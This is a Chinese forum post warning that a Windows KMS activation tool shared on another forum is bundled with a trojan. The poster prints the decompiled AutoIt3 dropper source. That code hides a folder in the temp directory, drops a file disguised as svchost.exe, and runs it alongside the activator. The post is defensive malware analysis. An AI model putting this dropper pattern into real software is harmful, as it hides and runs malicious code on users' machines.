|
本帖最后由 2012jiashanni 于 2019-5-18 00:52 编辑
原贴:http://wuyou.net/forum.php?mod=v ... tra=page%3D1&page=1
通过分析,发现这个程序是AU3编译的 压缩包
程序反编译后的源码显示
就是把一个名为 microkms.exe 的激活工具 与 svchost.exe [目测病毒] 释放到 临时目录 %TEMP%\TEMP 并设置这个目录隐藏
然后分别运行这两个程序
程序信息显示两个程序为同一个开发者
我猜报木马就是 svchost.exe 导致的
这也是目前 小部分激活工具发布者 通常会做的一个手法,通过第三方定制或自行开发,并捆绑木马,多半目的是劫持浏览器主页/捆绑软件/其他目的
目测这个 microkms.exe 是安全的为什么我猜microkms.exe 是安全的,因为他这个很明显是第三方定制的,如果是他自行开发或在定制的时候要求加入木马,完全用不到AU3二次打包进木马,直接内置在程序里就可以了,多半是开发这个激活工具的人没写入木马或者他意外得到这分源码但是只会改作者信息,所以只能AU3二次打包
当然也可能是第三方人嫁祸,重点在于 最干净的windows系统激活 这个帖子里的百度云下载过来的是的确有病毒的
这是 microkms.exe 的查毒报告,
https://habo.qq.com/file/showdetail?pk=ADcGZl1rB2QIP1s4U2Y%3D
可能这个发布者是想把正常能激活的工具与木马捆绑一起来达到增加收入的目的
这个网站发的激活工具 在网络上可查询到的是已经有人很早就反馈有病毒了
重点提醒 这个帖子里的工具不是误报 是真的有毒
反编译的AU3源码
#NoTrayIcon
#AutoIt3Wrapper_Icon=C:\Documents and Settings\Administrator\桌面\microkms.exe
#AutoIt3Wrapper_Res_Comment=在线KMS激活服务
#AutoIt3Wrapper_Res_Description=在线KMS激活服务
#AutoIt3Wrapper_Res_Fileversion=19.01.18.0
#AutoIt3Wrapper_Res_ProductVersion=19.01.18.0
#AutoIt3Wrapper_Res_Language=
#AutoIt3Wrapper_Res_LegalCopyright=www.yishimei.cn
DirCreate(@TempDir & "\temp")
DirCreate(@TempDir & "\temp")
DirCreate(@TempDir & "\temp")
FileSetAttrib(@TempDir & "\temp", "+S+H")
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\microkms.exe", @TempDir & "\temp\microkms.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\svchost.exe", @TempDir & "\temp\svchost.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\microkms.exe", @TempDir & "\temp\microkms.exe", 0)
FileInstall("C:\Documents and Settings\Administrator\桌面\temp\svchost.exe", @TempDir & "\temp\svchost.exe", 0)
Sleep(10)
Run(@TempDir & "\temp\microkms.exe", @TempDir & "\temp", @SW_SHOW)
Run(@TempDir & "\temp\svchost.exe", @TempDir & "\temp", @SW_SHOW)
|
评分
-
查看全部评分
|